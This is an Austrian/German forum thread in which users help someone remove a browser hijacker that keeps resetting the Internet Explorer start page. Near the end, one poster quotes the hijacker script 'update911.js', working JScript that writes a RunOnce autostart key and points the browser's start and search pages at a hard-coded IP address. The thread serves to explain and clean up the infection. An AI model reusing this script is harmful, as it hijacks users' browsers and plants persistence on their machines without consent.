Zitat von Sensei

Hab meinen PC auch schon mit Ad-aware durchsucht; das findet außer 3 Cookies von der orf.at Seite auch nix.

hast schon mal gschaut, was alles automatisch gestartet wird?
(ausführen -> msconfig -> autostart)
vielleicht solltest dort mal alles verdächtige rausschmeissen, kann ja sein, dass ad-aware den übeltäter nicht findet...

ausserdem könntest in der registry mal nach dem URL suchen, vielleicht gibts da nen eintrag, den du bis jetzt nicht gefunden hast...

Zitat von Sensei

hmmm...das hab ich ja schon gemacht

und das "alles-verdächtige-ausm-autostart-werfen" auch?
(und am besten danach gleich die gleichnamigen prozesse im taskmanager beenden, sonst stehts am ende wieder im autostart)

http://www.sysinternals.com/ntw2k/freeware/autoruns.shtml

downloaden und der Rest ergibt sich dann mit etwas Glück :-))
mfg Zentor

so was ähnliches hab ich auch mal gehabt - einmal aus Bequemlichkeit mit dem Iexplorer gesurft und schon passiert...

Da wurde bei jedem Programmstart über eine "load.bat" im Windows-Verzeichnis wieder die Registry geändert. Den Aufruf dieser .bat hab ich nie gefunden, aber wenigstens den Inhalt eliminiert.

das sind meistens sogenannte plugins.. leider nicht so leicht zu finden... die häufigste variante: in der registry gibt es einen eintrag 'ie plugins'. die beste methode ist, in der registry nach der geänderten adresse der startseite zu suchen.

lg michi

Scan mal mit Spybot http://www.safer-networking.org/

Macht das gleiche wie Ad-aware, hat aber eine umfassendere Datenbank.

probier mal ad-aware... vielleicht hast damit mehr glück als mit spybot.

Zitat von Sensei

ad-aware hab ich schon probiert (siehe meine posts weiter oben).

ABER:

BIN SOEBEN FÜNDIG GEWORDEN IM pc-praxis.de Forum für WinXP:


Das hat GEKLAPPT, also falls mal einer von euch so ein Prob hat...!

DANKE AUF JEDEN FALL AN ALLE FÜR EURE GROßARTIGE UNTERSTÜTZUNG!!!

CU, SENSEI

Alles anzeigen

gratuliere

hat jemand eine fachliche erklärung dafür??

lg michi

Nunja, fachliche Erklärung .. gleich das erste Ergebnis bei der Suche nach update911.js in Google fördert im Chip Online Forum folgendes zu Tage:

var url = "http://81.211.105.8/index.php?v=1";
var burl = "http://81.211.105.8/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

Der Eintrag war mit hoher Wahrscheinlichkeit die ganze Zeit im RunOnce Schlüssel und wurde von sensei einfach übersehen. :shinner:

Tja und wohl auch mein Posting von oben. autoruns listet alles auf was bei XP so autostarten kann, auch die IE-Plugins...
Und ein update911.js im RunOnce is ja echt kein großartig verschleierter autostart
mfg Zentor

sorry hätte wohl mal selber googeln sollen :shinner:
man kann über das autorun direkt javascripts starten? oder geht das eh über den ie?

Cyrill: msconfig machts eigentlich auch im großen und ganzen.. wenn man zb xp hat. hab bis jetzt noch nie was gesehen was automatisch gestartet ist und nicht dort drinstand.. obwohls ja da glaube ich noch zwei oder drei hintertürchen gibt...

lg michi